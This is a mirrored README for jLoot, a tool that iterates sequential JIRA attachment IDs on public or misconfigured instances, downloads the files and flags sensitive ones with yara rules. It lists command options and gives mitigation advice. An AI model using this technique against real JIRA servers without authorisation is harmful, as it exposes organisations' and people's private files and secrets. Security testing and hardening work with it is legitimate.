Coder Social home page Coder Social logo

jloot's Introduction

jLoot - JIRA Secure Attachment Looter

jLoot is a tool that can be used to enumerate attachments to JIRA tickets.

When files are attached to issues in JIRA, they are given a sequential number and stored. While there are access controls on most installations, if a JIRA was meant to be public, or if it was misconfigured by the organization, the files are easily iterable.

jLoot simplifies the iteration process by checking if a file exists at a given ID number, and downloading it.

jLoot comes with a basic set of yara rules to check incoming files for sensitive words. If a rule matches, it will appear highlighted in red next to the file name. You can use the -y flag to specify your own yara rules, or edit jLoot.yar

If a file matches a yara rule, it has the word "CHECK_" appended to the beginning of the filename for easy recall of sensitive files.

Command Line Options

The following command line options are supported:

 -u baseURL     The base url of the JIRA instance
 -s start_id    The starting attachment ID (attachments start at 10000)
 -l limit       The limit for file downloads
 -o out_dir     The output directory (default is loot/)
 -y yara_rules  Specify custom yara rules

Setup

If you don't have yara installed, you can use this guide to install it. Install yara for python using python3 -m pip install yara-python

If you get an error about yara not being able to find libyara, run these commands:

sudo sh -c 'echo "/usr/local/lib" >> /etc/ld.so.conf'
sudo ldconfig

How do I not let this be a thing?

JIRA is meant to be public, and as such, has default weak configurations that allow for anyone to access public aspects of your boards. There are a few mitigations you can implement:

  • Server Side Rate-Limiting
  • Firewall Rules
  • Granular File Permissions on JIRA
  • Require Authentication to JIRA

Here are some links for reference:

Shouts

Big shoutout to hermit for finding the initial dorks that led to this tool. Shoutout to ThugCrowd and all the Safari Zone Game Wardens.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.